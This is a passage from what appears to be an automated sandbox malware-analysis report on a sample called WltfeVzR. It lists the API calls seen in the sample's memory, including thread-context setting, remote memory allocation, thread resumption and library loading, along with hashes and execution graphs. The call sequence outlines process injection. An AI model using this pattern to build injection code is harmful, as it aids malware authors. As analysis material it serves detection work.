                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 6faf2ff855cf8cf25ce9ca178c2c06aa0481e80b0108be7f22f390ced3e64ed6
                        • Instruction ID: 60850fd2f07ad2b226b2611d0f889ec64a552abaf2efb33f22677a33a676c082
                        • Opcode Fuzzy Hash: 6faf2ff855cf8cf25ce9ca178c2c06aa0481e80b0108be7f22f390ced3e64ed6
                        • Instruction Fuzzy Hash: A1212AB19003599FCB10CFAAC845AEEBBF5FF48320F108429E519A7240C7799904DBA0
                        APIs
                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076C721E
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: f62da7cb9399845c4675ffcb13eae1b14ca6281b63485fc1cded325e75bfe1a2
                        • Instruction ID: 08470128f025224a2e35b1603b5b4ac4e2e94991420db1da93aa797b4d4b9c03
                        • Opcode Fuzzy Hash: f62da7cb9399845c4675ffcb13eae1b14ca6281b63485fc1cded325e75bfe1a2
                        • Instruction Fuzzy Hash: A12118B19003099FDB10DFAAC4857AEBBF4EF88324F14842AD559A7340C7789945CFA5
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076C72E6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 689db1b12b9441b16949bd3ef293d822798832bad5fc057b6d7cf43482ce08c3
                        • Instruction ID: 7b1bb9fc70794966459db344549773c5056a97b7e17fdd0d9493951c0ec5e385
                        • Opcode Fuzzy Hash: 689db1b12b9441b16949bd3ef293d822798832bad5fc057b6d7cf43482ce08c3
                        • Instruction Fuzzy Hash: 3C117CB29002499FCB10DFAAC845BEEBFF5EF88320F20881AE519A7350C7759940CF90
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E0F201,00000800,00000000,00000000), ref: 02E0F412
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: e9cf8822cab5d4d9e028269a2d04cc292059fe481cf39a6775f96e3f2bbcc6dd
                        • Instruction ID: c4b0a56f928791c9e427e3ac70e9d5da1340274386feb1a170e15c36bf2b456a
                        • Opcode Fuzzy Hash: e9cf8822cab5d4d9e028269a2d04cc292059fe481cf39a6775f96e3f2bbcc6dd
                        • Instruction Fuzzy Hash: BF1106B59002499FDB20CF9AC484ADEFBF4FB88324F10842AD819A7640C779A545CFA4
                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076C72E6
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: c555cfe87bbe9043c1cdda1c8029650909c12c9cfd2bd7e4c5c26589aedfdfad
                        • Instruction ID: e8306ca53e2a6b221a5173f352c36b03fd66792cb89ed9bff37b8169b7cf796a
                        • Opcode Fuzzy Hash: c555cfe87bbe9043c1cdda1c8029650909c12c9cfd2bd7e4c5c26589aedfdfad
                        • Instruction Fuzzy Hash: C2114CB19002499FCB10DFAAC845BDFBFF5EF88320F248819E519A7250C7759540DFA0
                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 20b8deef2a18aba5db42720c5631860226a83d62c573dbb8423eeef1f18d2a43
                        • Instruction ID: c5038802e93b75373e56f09952076dcf71c025083017d3f21f15faeea8af797a
                        • Opcode Fuzzy Hash: 20b8deef2a18aba5db42720c5631860226a83d62c573dbb8423eeef1f18d2a43
                        • Instruction Fuzzy Hash: 6B1128B19003498BDB20DFAAC4457AEFBF5EF88324F248819D519A7340C6756944CF94
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076CACA5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 6db3eedd3792eb01dfb01625d6a88c68ad97fd8dcef812119f793970d4cceeaa
                        • Instruction ID: bd7edeafa69bdde9c8a5fe57f2009663a73d6974fec0979ec69064c14b1e973f
                        • Opcode Fuzzy Hash: 6db3eedd3792eb01dfb01625d6a88c68ad97fd8dcef812119f793970d4cceeaa
                        • Instruction Fuzzy Hash: 3211E3B58003499FDB10CF9AD545BDEBFF8EB48320F20881AD518A7700C375A954CFA5
                        APIs
                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 076CACA5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2199071359.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_76c0000_WltfeVzR.jbxd
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: 2c49b00466d46a2b098af5f8f1f32f45b87766dbf8336e61b3bf3ca90b1c33c7
                        • Instruction ID: 69ca1e334a697d00705da8c6a666fe7ef871f6e8a2e6a2c434864deac8b32d46
                        • Opcode Fuzzy Hash: 2c49b00466d46a2b098af5f8f1f32f45b87766dbf8336e61b3bf3ca90b1c33c7
                        • Instruction Fuzzy Hash: CA11F5B58003499FDB20CF9AC585BEEBBF8FB48324F208419E919A7700C375A944CFA5
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E0F186
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2195531275.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_2e00000_WltfeVzR.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 24205294ab21b2597e4e73fde0a97e3a084de60b2b37b41120270edf5bff9785
                        • Instruction ID: f26d4f8f16fccbf6d67ddeb0ea15212cf5983f322f47ffa348a823bbabd49a56
                        • Opcode Fuzzy Hash: 24205294ab21b2597e4e73fde0a97e3a084de60b2b37b41120270edf5bff9785
                        • Instruction Fuzzy Hash: 9F1102B5C002498FCB20CF9AC944A9EFBF4EF88224F10845AD418A7641C375A945CFA1

                        Execution Graph

                        Execution Coverage:13.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:34
                        Total number of Limit Nodes:2
                        execution_graph 27923 2b50871 27927 2b508d8 27923->27927 27932 2b508c8 27923->27932 27924 2b50889 27928 2b508fa 27927->27928 27937 2b50ce0 27928->27937 27941 2b50ce8 27928->27941 27929 2b5093e 27929->27924 27933 2b508d8 27932->27933 27934 2b50ce0 GetConsoleWindow 27933->27934 27935 2b50ce8 GetConsoleWindow 27933->27935 27936 2b5093e 27934->27936 27935->27936 27936->27924 27938 2b50d26 GetConsoleWindow 27937->27938 27940 2b50d56 27938->27940 27940->27929 27942 2b50d26 GetConsoleWindow 27941->27942 27944 2b50d56 27942->27944 27944->27929 27945 6556361 27946 65562fc 27945->27946 27947 655636a 27945->27947 27946->27947 27952 65573f1 27946->27952 27956 6557390 27946->27956 27960 6557400 27946->27960 27948 655631d 27954 655738d 27952->27954 27953 6557451 27953->27948 27954->27952 27954->27953 27964 6557148 27954->27964 27957 655738d 27956->27957 27957->27956 27958 6557451 27957->27958 27959 6557148 LoadLibraryW 27957->27959 27958->27948 27959->27958 27962 6557448 27960->27962 27961 6557451 27961->27948 27962->27961 27963 6557148 LoadLibraryW 27962->27963 27963->27961 27965 65575f0 LoadLibraryW 27964->27965 27967 6557665 27965->27967 27967->27953

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1027 65575e8-65575ea 1028 65575f2-6557630 1027->1028 1029 65575ec-65575f1 1027->1029 1031 6557632-6557635 1028->1031 1032 6557638-6557663 LoadLibraryW 1028->1032 1029->1028 1031->1032 1033 6557665-655766b 1032->1033 1034 655766c-6557689 1032->1034 1033->1034
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065574A6), ref: 06557656
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332838917.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6550000_WltfeVzR.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: Mg
                        • API String ID: 1029625771-763070451
                        • Opcode ID: 54b608695de51c6f5c27102a0aa29d6763a1e41a5a8a9912e4e64042c45f93d4
                        • Instruction ID: dce1e36bf6fd3cd65edba28508a02858166c4faa9047c3e3194668c2f397013b
                        • Opcode Fuzzy Hash: 54b608695de51c6f5c27102a0aa29d6763a1e41a5a8a9912e4e64042c45f93d4
                        • Instruction Fuzzy Hash: 171133B5C002498FCB10CF9AC844ADEFBF5AB88210F11841AD829A7710C374A506CFA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1037 6557148-6557630 1040 6557632-6557635 1037->1040 1041 6557638-6557663 LoadLibraryW 1037->1041 1040->1041 1042 6557665-655766b 1041->1042 1043 655766c-6557689 1041->1043 1042->1043
                        APIs
                        • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065574A6), ref: 06557656
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332838917.0000000006550000.00000040.00000800.00020000.00000000.sdmp, Offset: 06550000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6550000_WltfeVzR.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: Mg
                        • API String ID: 1029625771-763070451
                        • Opcode ID: e2f4a92a2e47833ac0365ed5dfdd65e30277f4732e10e535533aa38a51a37a8f
                        • Instruction ID: 46641d845dbb4c51b75ddb55a0dffde496009572ca0102d4fadb39869fb01b2d
                        • Opcode Fuzzy Hash: e2f4a92a2e47833ac0365ed5dfdd65e30277f4732e10e535533aa38a51a37a8f
                        • Instruction Fuzzy Hash: BC1112B5D003498FCB10CF9AC848B9EFBF4EF88220F15841AD829B7200D375A545CFA4

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1046 2b50ce0-2b50d54 GetConsoleWindow 1049 2b50d56-2b50d5c 1046->1049 1050 2b50d5d-2b50d82 1046->1050 1049->1050
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 02B50D47
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2316111532.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_2b50000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID: Mg
                        • API String ID: 2863861424-763070451
                        • Opcode ID: 83958bdcdd067db39f001c21f227fec61bee14b959349320c70da8704d5e2cbf
                        • Instruction ID: e10a5be8d173e67ad10f361547abf4ec20e07efc7a5580c19d6739ba3ec9be37
                        • Opcode Fuzzy Hash: 83958bdcdd067db39f001c21f227fec61bee14b959349320c70da8704d5e2cbf
                        • Instruction Fuzzy Hash: 681128B5D003498FCB20DFAAC5467DEBFF5AF88324F24885AD419AB250CB796544CF90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1054 2b50ce8-2b50d54 GetConsoleWindow 1057 2b50d56-2b50d5c 1054->1057 1058 2b50d5d-2b50d82 1054->1058 1057->1058
                        APIs
                        • GetConsoleWindow.KERNELBASE ref: 02B50D47
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2316111532.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_2b50000_WltfeVzR.jbxd
                        Similarity
                        • API ID: ConsoleWindow
                        • String ID: Mg
                        • API String ID: 2863861424-763070451
                        • Opcode ID: 2b41d6ba0dee0fa7dab3ed181a9a234352dcb2e587cb55791cd37b0337168db9
                        • Instruction ID: dc5a2ae218bad826b0610a2b5504acdb61796e347a413ac30ef1c3d16bcbbcf9
                        • Opcode Fuzzy Hash: 2b41d6ba0dee0fa7dab3ed181a9a234352dcb2e587cb55791cd37b0337168db9
                        • Instruction Fuzzy Hash: A31136B5D003498FCB20DFAAC44679EFFF4EF48324F20885AD419AB240CB796544CBA0
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Memory Dump Source
                        • Source File: 00000010.00000002.2315569569.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_122d000_WltfeVzR.jbxd
                        Memory Dump Source
                        • Source File: 00000010.00000002.2315625253.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_123d000_WltfeVzR.jbxd
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.2332959806.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_65a0000_WltfeVzR.jbxd
                        Similarity
                        • API ID:
                        • String ID: $sq$$sq$$sq$$sq$$sq$$sq$$sq$$sq
                        • API String ID: 0-3003498